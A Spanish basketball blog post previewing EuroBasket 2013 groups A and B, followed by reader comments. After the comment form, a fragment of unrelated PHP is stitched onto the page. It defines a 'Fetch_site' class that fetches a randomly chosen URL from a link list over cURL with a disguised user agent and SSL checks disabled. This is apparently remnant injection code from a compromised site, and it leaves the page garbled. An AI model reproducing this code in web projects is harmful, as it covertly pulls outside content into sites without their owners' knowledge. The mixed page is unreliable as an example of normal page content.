EuroNBAsket 2013: La previa (Grupos A y B)

02 de September de 2013 por TheDeerHunter

Vuelve el basket y vuelve TJNBA. Tras el artículo sobre Gail Goodrich con que inauguramos el curso 2013/14, seguimos con el aperitivo del inminente Eurobasket de Eslovenia, donde podremos disfrutar del talento de algunos de los mejores jugadores europeos de nuestra liga preferida. Recalcamos “algunos” porque si en la anterior edición celebrada en Lituania el lockout NBA favoreció la participación masiva de sus representantes en esta ocasión destacan las grandes ausencias. Echaremos de menos a los Nowitzki, Gasol, Kirilenko, Noah, Ibaka, Pekovic, Deng, etc. aunque quizá esto nos permita conocer mejor a las estrellas europeas que vienen. Es el turno de Ricky, de Vucevic, de Valanciunas, de Motiejunas…

GRUPO A

Aparentemente una liguilla plácida para los vigentes subcampeones, Francia. Puede que esta sea la gran oportunidad de los franceses para, por fin, coronarse en Europa. Cuentan con una lista de bajas NBA que sería definitiva para cualquiera (Noah, Mahinmi, Seraphin, Turiaf, Beaubois, M. Pietrus) y un juego interior prácticamente inédito a este nivel de competición pero tienen a su disposición a un potencial MVP como es Tony Parker y, aún con ausencias, la representación NBA más numerosa del campeonato. Será clave para sus aspiraciones el rendimiento de Nico Batum y Boris Diaw y la consolidación de Nando De Colo y Evan Fournier. No olvidemos a Johan Petro aunque seguro que será más importante para ellos la aportación de otros nombres como Gelabale, Ajinça o Florent Pietrus. A seguir: Joffrey Lavergne.

A partir de aquí, en el grupo A la presencia NBA brilla, nunca mejor dicho, por su ausencia. Alemania va a echar necesariamente de menos al irrepetible Dirk Nowitzki. También a Chris Kaman y a los rookies Tim Ohlbrecht, Dennis Schroeder y Elias Harris. Sin ellos lo van a tener muy difícil para pasar de ronda incluso en este grupo tan débil. Algo similar pasa con Gran Bretaña. La resaca olímpica deja un panorama desolador. Ninguno de sus seleccionables NBA (Luol Deng, Joel Freeland, Ben Gordon o BJ Mullens) ha mostrado interés por la cita ni tampoco habituales como Pop Mensah-Bonsu o Robert Archibald. Complicada papeleta para Joe Prunty, asistente de Brookly Nets. 

Previsiblemente uno de los dos billetes restantes a la segunda ronda será para la rocosa Ucrania de Mike Fratello, a pesar de la baja de Alex Len. Alrededor del jugador de los Suns, Viacheslav Kravtsov cuentan con un equipo de oficio. A destacar la nacionalización de “Pooh” Jeeter y el temprano corte de Kyrylo Fesenko.

El otro billete podría caerle en suerte a una de las dos “Marías” del grupo que en otras circunstancias no podrían soñar con aspirar a semejante logro. Omri Casspi lidera a Israel en un excelente estado de forma por lo visto en el Preeuropeo. Por el contrario, la renuncia de Gal Mekel, nuevo fichaje de Mavs, supone un contratiempo para sus opciones. De todas maneras, con viejos conocidos como Eliyahu o Halperin, los hebreos cuentan con un talento ofensivo que no puede ser infravalorado.

Bélgica, por su lado, no cuenta con NBAs pero sí con “el fichaje” del nacionalizado americano y nuevo jugador del Olympiacos Matt Lojeski. La FIBA reconocía recientemente como belga a todos los efectos a Wen Bon Mukubu, permitiendo la inscripción de Lojeski. Se une a sus compatriotas Muya y Tabu. Además cuenta con conocidos de la afición española como Axel Hervelle y Sam Van Rossom para formar un equipo compacto. Su balance previo ha sido el segundo mejor del grupo.

GRUPO B

Si el “A” es un grupo facilón en el B pasa todo lo contrario. Cualquiera puede amargar la vida a cualquiera y supondrán un cruce temible todos los que pasen. 3 buenas selecciones quedarán fuera.

El coco es, cómo no, Lituania. Cuentan con el mejor juego interior del campeonato. Un Jonas Valanciunas potenciado junto a Donatas Motiejunas, y si no querías postre, los hermanos Lavrinovic y Javtocas. Por fuera Kleiza, Pocius, Kalnietis… una selección prácticamente sin fisuras a la altura de un país donde el baloncesto es religión. Falta, eso sí, el sempiterno Jasikevicius y la construcción del juego lo debe notar.

Después, otro de los trasatlánticos europeos, Serbia. Nemanja Nedovic es su única representación NBA pero cuentan con una selección joven y potente, con el peso de la historia a su favor y un oficio casi genético. En contra, un buen número de ausencias importantes que sólo una cantera como ésta puede suplir. Ivkovic no lo va a tener fácil en el grupo de la muerte, pero resulta casi impensable una segunda ronda sin ellos.

Macedonia deslumbró en el pasado Eurobasket pero ha decepcionado en la preparación. Ya no cuentan con ese factor sorpresa de antaño y McCalebb viene de sufrir problemas físicos todo el año. Alrededor del “rookie” de los Hawks Pero Antic sigue habiendo dinamita. Nadie se puede fiar de ellos.

Llega particularmente fuerte Montenegro, a pesar de la ausencia de Pekovic. Nikola Vucevic, sin embargo, está en la cresta de la ola. Es su año y lidera un juego interior interesante junto al ACB Dubljevic. Destaca la presencia de Ty Rice y de Sekulic. Equipo ordenado que seguro plantará batalla por la segunda ronda.

Por su parte Bosnia y Herzegovina llega al campeonato con un punto de depresión, a imagen de su gran estrella Mirza Teletovic. De ser considerado uno de los mejores “cuatros” de Europa a la gran decepción tras su paso por la NBA, tratará de reencontrarse a sí mismo. Para ello cuenta con fieles escuderos como Zack Wright, Djedovic o Kikanovic y la experiencia de un ilustre como Alexander Petrovic en el banquillo.

Por último tenemos a Letonia, que tratará (¿cómo Biedrins en la NBA?) recuperar el nivel que alguna vez llegó a mostrar. Los Bertans, Kuksis, Berzins buscarán, con aquel estilo descarado que les caracteriza, darla campanada.

Comenta

5 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Fournier no va y Lojeski tampoco. Kleiza jugará de 4 previsiblemente en Lituania. No creo que Ucrania haga nada y sí creo que Alemania lo tiene bastante fácil para pasar ronda.

      Citar

  2. jhc dice:
    #2

    Valla pinta que tiene el grupo 2 buenos equipos todos, Georgia y Letonia quizas un poco por debajo pero ambas pasarian en el grupo 1

      Citar

  3. TheDeerHunter dice:
    #3

    Pues Teodosic también se cae.
    Ójala me equivoque, pero el nivel de este Eurobasket se ve bastante por los suelos.

      Citar

  4. jhc dice:
    #4

    Buena noticia para España y mala para el eurobasket

      Citar

  5. Nacho dice:
    #5

    @Deer. Normal en año postolímpico y con un mundial (sobre todo para España, pero para Francia y otras también) a la vuelta de la esquina.
    A Francia le falta Noah para ser el equipazo del eurobasket. Aún así les falta ese punto competitivo que le faltaba a España hace años, y que hoy nos hace ser favoritos sin el mejor quinteto.
    El resto de los equipos de este lado un quiero y no puedo a expensas de que Lituania de ese paso que perdió tras Sabonis. Calidad tiene, pero…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>